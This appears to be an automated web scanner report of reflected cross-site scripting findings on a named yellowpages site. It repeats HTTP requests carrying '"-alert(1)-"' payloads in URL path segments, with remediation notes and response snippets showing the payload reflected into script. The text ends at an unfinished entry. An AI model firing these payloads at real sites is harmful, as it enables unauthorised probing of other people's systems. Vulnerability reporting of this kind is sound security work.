GET /common/cssdee76"-alert(1)-"0d4decbeb19/structure.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b1738"-alert(1)-"099ed66255a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/structure.cssb1738"-alert(1)-"099ed66255a HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 992a6"-alert(1)-"25f8f156e7b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common992a6"-alert(1)-"25f8f156e7b/css/styles.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd028"-alert(1)-"da24c435281 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/cssdd028"-alert(1)-"da24c435281/styles.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67e49"-alert(1)-"cece7288702 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/styles.css67e49"-alert(1)-"cece7288702 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dd884"-alert(1)-"66558d398fa was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commondd884"-alert(1)-"66558d398fa/css/typography.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6cec5"-alert(1)-"d776eed8f91 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css6cec5"-alert(1)-"d776eed8f91/typography.css HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c512b"-alert(1)-"208ebd640d3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/css/typography.cssc512b"-alert(1)-"208ebd640d3 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: text/css,*/*;q=0.1 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1603f"-alert(1)-"7b40bab0d58 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common1603f"-alert(1)-"7b40bab0d58/js/alertcommon.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 20813"-alert(1)-"42f38a119fb was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js20813"-alert(1)-"42f38a119fb/alertcommon.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c615e"-alert(1)-"fd5addf1395 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/alertcommon.jsc615e"-alert(1)-"fd5addf1395 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bae19"-alert(1)-"9957299e054 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonbae19"-alert(1)-"9957299e054/js/browser_check.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 67314"-alert(1)-"4d0383f1bcf was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js67314"-alert(1)-"4d0383f1bcf/browser_check.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4823"-alert(1)-"6b96276b57d was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/browser_check.jsb4823"-alert(1)-"6b96276b57d HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload aa65f"-alert(1)-"34ef4e6041c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonaa65f"-alert(1)-"34ef4e6041c/js/iepopup.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 7547e"-alert(1)-"e77ecaba831 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js7547e"-alert(1)-"e77ecaba831/iepopup.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57121"-alert(1)-"a019059d18b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/iepopup.js57121"-alert(1)-"a019059d18b HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 12235"-alert(1)-"2aa4880554e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common12235"-alert(1)-"2aa4880554e/js/jquery-1.4.2.min.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6e853"-alert(1)-"4df34621227 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js6e853"-alert(1)-"4df34621227/jquery-1.4.2.min.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 4c940"-alert(1)-"8d600cbb5e6 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery-1.4.2.min.js4c940"-alert(1)-"8d600cbb5e6 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f4138"-alert(1)-"d392b5225e3 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /commonf4138"-alert(1)-"d392b5225e3/js/jquery-plugins.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dc582"-alert(1)-"51b3ea3bf60 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsdc582"-alert(1)-"51b3ea3bf60/jquery-plugins.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fce99"-alert(1)-"1f8bcc299d1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/js/jquery-plugins.jsfce99"-alert(1)-"1f8bcc299d1 HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39dde"-alert(1)-"ad48974274b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
...[SNIP]... erv = 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/common39dde"-alert(1)-"ad48974274b/js/jquery.history_remote.js?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c965f"-alert(1)-"9b53f386972 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js HTTP/1.1 Host: yellowpages.superpages.com Proxy-Connection: keep-alive Referer: http://www.superpages.com/bp/US/Ally-Bank-The-Bank-That-Is-Wherever-You-Are-L2118363360.htm?SRC=comlocal1a&lbp=1&PGID=dalms102.8089.1296748577335.307646855&bidType=CLIK&TR=1 Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: SPC=1296748823650-www.superpages.com-30323935-794472
...[SNIP]... = 'http://yellowpages.superpages.com'; var searchtype="two";
searchtype="one";
var actualUrl = "http://yellowpages.superpages.com/common/jsc965f"-alert(1)-"9b53f386972/jquery.history_remote.js?="; var client_id = "133515049997773";
var redirecturl = 'http://yellowpages.superpages.com/Facebook';
The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfa09"-alert(1)-"556c143ae67 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
